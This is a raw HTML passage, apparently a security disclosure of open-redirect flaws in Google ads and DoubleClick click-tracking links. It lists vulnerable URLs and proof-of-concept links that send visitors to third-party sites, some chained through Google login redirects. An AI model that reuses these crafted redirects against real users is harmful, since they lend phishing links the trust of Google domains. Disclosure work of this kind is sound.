<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>CWEQH6Q73UqW9CMvMigfdiIGoB9rlk<wbr></wbr>sIEAAAQASAAUO7kr-b8_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEggFP0<wbr></wbr>E-9agyjXkIfjOxmtpPE76hNCBn1in_<wbr></wbr>meKMn53O-<wbr></wbr>8ZFlbxWDgYdaVZQKJza8mIRXw22hWI<wbr></wbr>VMAOJJzq-S6AipWHe9iVZCAAlcHj-<wbr></wbr>gT2B33tD9a2oQrZ61S3-WFh_<wbr></wbr>8T8RFUFnC_PRC35CTFbueQrUYjC-<wbr></wbr>j6ncVXzt_IPXugo5vE-3x4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_<wbr></wbr>2petJH0A9Zjj45GN117ocBukiroA&<wbr></wbr>client=ca-pub-<wbr></wbr>0466582109566532&adurl=http://<wbr></wbr>www.tetraph.com/security</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ&client=<wbr></wbr>ca-pub-0466582109566532&adurl=<wbr></wbr>http://www.tetraph.com/<wbr></wbr>security</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Attackers can make use of the following URLs to make the attacks more powerful, i.e.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/ServiceLogin?continue=https%3A%2F%2Fsites.google.com%2Fsite%2Fissrabhi%2Fhome&service=jotspot&passive=true&ul=1" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/ServiceLogin?<wbr></wbr>continue=https%3A%2F%2Fsites.<wbr></wbr>google.com%2Fsite%2Fissrabhi%<wbr></wbr>2Fhome&service=jotspot&<wbr></wbr>passive=true&ul=1</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1%26auth%3D*" style="background-color: white;" target="_blank">https://accounts.google.com/<wbr></wbr>accounts/SetSID?ssdc=1&sidt=*&<wbr></wbr>continue=http%3A%2F%2Fwww.<wbr></wbr>orkut.com%2FRedirLogin%3Fmsg%<wbr></wbr>3D1%26auth%3D*</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessaybeans%2Freflections%2Fsolitude.html" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/ServiceLogin?<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.tetraph.<wbr></wbr>com%2Fessaybeans%<wbr></wbr>2Freflections%2Fsolitude.html</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.diebiyi.com%2Farticles" style="background-color: white;" target="_blank">https://accounts.google.com/<wbr></wbr>accounts/SetSID?ssdc=1&sidt=*&<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.diebiyi.<wbr></wbr>com%2Farticles</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1.2)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">While Google prevents similar URL redirection other than googleads.g.doubleclick.<wbr></wbr>net , e.g.</span></div>
<div class="">
<div class="" data-tooltip="Hide expanded content" id=":2fp" role="button" tabindex="0">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><img class="" src="https://ssl.gstatic.com/ui/v1/icons/mail/images/cleardot.gif" /></span></div>
</div>
<div class="">
<div class="im">
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.googleadservices.com/pagead/aclk?sa=L&ai=C8u9OibgEU_XIOKrNswfrzYDgAY2FhfgE1aLjnoYB-7qSCxADILhPKANQrt2khP3_____AWC_BaAB8-vV0gPIAQGqBChP0AshNp656okgv3tSxmgc3JZeuS25cM0HlW9wUqHwxL8nk75mFPqsgAf1k6otkAcB&num=3&val=ChA2MWI5ODZkYzA4MTlmZmRlEN-mlZgFGgghk-txLb-9bSABKAAwhPDs-dD_xPHhATj6w5KYBUD6w5KYBQ&sig=AOD64_2f3wWGlepm4KMYlixE15qmjC1FGw&adurl=http://freshservice.com/free-service-desk/" style="background-color: white;" target="_blank">http://www.googleadservices.<wbr></wbr>com/pagead/aclk?sa=L&ai=<wbr></wbr>C8u9OibgEU_<wbr></wbr>XIOKrNswfrzYDgAY2FhfgE1aLjnoYB<wbr></wbr>-7qSCxADILhPKANQrt2khP3_____<wbr></wbr>AWC_BaAB8-<wbr></wbr>vV0gPIAQGqBChP0AshNp656okgv3tS<wbr></wbr>xmgc3JZeuS25cM0HlW9wUqHwxL8nk7<wbr></wbr>5mFPqsgAf1k6otkAcB&num=3&val=<wbr></wbr>ChA2MWI5ODZkYzA4MTlmZmRlEN-<wbr></wbr>mlZgFGgghk-txLb-9bSABKAAwhPDs-<wbr></wbr>dD_xPHhATj6w5KYBUD6w5KYBQ&sig=<wbr></wbr>AOD64_<wbr></wbr>2f3wWGlepm4KMYlixE15qmjC1FGw&<wbr></wbr>adurl=http://freshservice.com/<wbr></wbr>free-service-desk/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.googleadservices.com/pagead/aclk?sa=L&ai=C6w2J2VL1UtqeFtPFsQe_xICACOur9I0Gm4qOwXKd4q7LvAEQAiC4TygCUPrp_p7______wFgvwWgAY2TjcoDyAEBqQJGONe13HWqPqoEIk_QksMhB61R5_EBc-rRl0G3mUtOQjLemb4NjAETa6dj-AGAB9vs8jWQBwE&num=2&val=ChA5MDRhYzc4NjJiNjFlMzZlEO6g15cFGgjqLoQCBAXi2SABKAAw6sfV44GF7cZ_OMbI1ZcFQMbI1ZcF&sig=AOD64_1g--5hg2Tc0L5irweEKYqbh1FwSw&adurl=https://www.singtelshop.com/mobile/phone-details.jsf%3FbrandId%3D122%26modelId%3DZ10" style="background-color: white;" target="_blank">http://www.googleadservices.<wbr></wbr>com/pagead/aclk?sa=L&ai=<wbr></wbr>C6w2J2VL1UtqeFtPFsQe_<wbr></wbr>xICACOur9I0Gm4qOwXKd4q7LvAEQAi<wbr></wbr>C4TygCUPrp_p7______<wbr></wbr>wFgvwWgAY2TjcoDyAEBqQJGONe13HW<wbr></wbr>qPqoEIk_QksMhB61R5_EBc-<wbr></wbr>rRl0G3mUtOQjLemb4NjAETa6dj-<wbr></wbr>AGAB9vs8jWQBwE&num=2&val=<wbr></wbr>ChA5MDRhYzc4NjJiNjFlMzZlEO6g15<wbr></wbr>cFGgjqLoQCBAXi2SABKAAw6sfV44GF<wbr></wbr>7cZ_OMbI1ZcFQMbI1ZcF&sig=<wbr></wbr>AOD64_1g--<wbr></wbr>5hg2Tc0L5irweEKYqbh1FwSw&<wbr></wbr>adurl=https://www.singtelshop.<wbr></wbr>com/mobile/phone-details.jsf%<wbr></wbr>3FbrandId%3D122%26modelId%<wbr></wbr>3DZ10</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.2) Vulnerable URLs Related to DoubleClick.net.</b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 1:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://<wbr></wbr>noteok.zdnet.com.cn/notebook/<wbr></wbr>2013/1113/2995493.shtml</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://<wbr></wbr>noteok.zdnet.com.cn/notebook/<wbr></wbr>2013/1113/2995493.shtml</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://www.<wbr></wbr>inzeed.com/kaleidoscope/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security" style="background-color: white;" target="_blank">http://ad.doubleclick.net/<wbr></wbr>click;h=v2%7C4133%7C0%7C0%7C%<wbr></wbr>2a%7Cl;276061443;0-0;0;<wbr></wbr>103152519;31-1%7C1;55814388%<wbr></wbr>7C55703677%7C1;;%3fhttp://www.<wbr></wbr>tetraph.com/security</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 2:</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>275260754;102106837;b?http://<wbr></wbr>zerodistance.cio.com</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;276304929;103445101;w?http://tracker.marinsm.com/rd" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>276304929;103445101;w?http://<wbr></wbr>tracker.marinsm.com/rd</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
